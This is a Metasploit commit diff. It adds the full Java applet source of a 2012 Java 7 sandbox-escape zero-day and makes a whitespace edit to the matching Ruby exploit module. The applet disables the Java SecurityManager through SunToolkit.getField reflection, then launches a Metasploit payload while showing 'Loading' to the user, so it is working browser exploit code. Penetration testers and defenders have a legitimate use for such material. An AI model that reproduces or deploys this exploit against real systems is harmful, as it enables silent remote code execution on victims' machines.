Merge branch 'master' into release

Almost certainly not going to be the final release, but this gets
through the merge conflict on the Java stuff.

Conflicts:
	modules/exploits/multi/browser/java_jre17_exec.rb

external/source/exploits/CVE-2012-XXXX/Exploit.java

@@ -0,0 +1,75 @@
+//
+// CVE-2012-XXXX Java 0day
+//
+// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
+
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.beans.Expression;
+import java.beans.Statement;
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.Certificate;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+    public Exploit()
+    {
+    }
+
+    public void disableSecurity()
+        throws Throwable
+    {
+        Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
+        Permissions localPermissions = new Permissions();
+        localPermissions.add(new AllPermission());
+        ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
+        AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
+            localProtectionDomain
+        });
+        SetField(Statement.class, "acc", localStatement, localAccessControlContext);
+        localStatement.execute();
+    }
+
+    private Class GetClass(String paramString)
+        throws Throwable
+    {
+        Object arrayOfObject[] = new Object[1];
+        arrayOfObject[0] = paramString;
+        Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
+        localExpression.execute();
+        return (Class)localExpression.getValue();
+    }
+
+    private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
+        throws Throwable
+    {
+        Object arrayOfObject[] = new Object[2];
+        arrayOfObject[0] = paramClass;
+        arrayOfObject[1] = paramString;
+        Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
+        localExpression.execute();
+        ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
+    }
+
+    public void init()
+    {
+        try
+        {
+            disableSecurity();
+			Payload.main(null);               
+        }
+        catch(Throwable localThrowable)
+        {
+            localThrowable.printStackTrace();
+        }
+    }
+
+    public void paint(Graphics paramGraphics)
+    {
+        paramGraphics.drawString("Loading", 50, 25);
+    }
+}

modules/exploits/multi/browser/java_jre17_exec.rb

@@ -20,7 +20,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		super( update_info( info,
 			'Name'          => 'Java 7 Applet Remote Code Execution',
 			'Description'   => %q{
-					This module exploits a vulnerability in Java 7, which allows an attacker to run
+				This module exploits a vulnerability in Java 7, which allows an attacker to run
 				arbitrary Java code outside the sandbox. The vulnerability seems to be related to
 				the use of the newly introduced ClassFinder#resolveClass in Java 7, which allows
 				the sun.awt.SunToolkit class to be loaded and modified. Please note this flaw is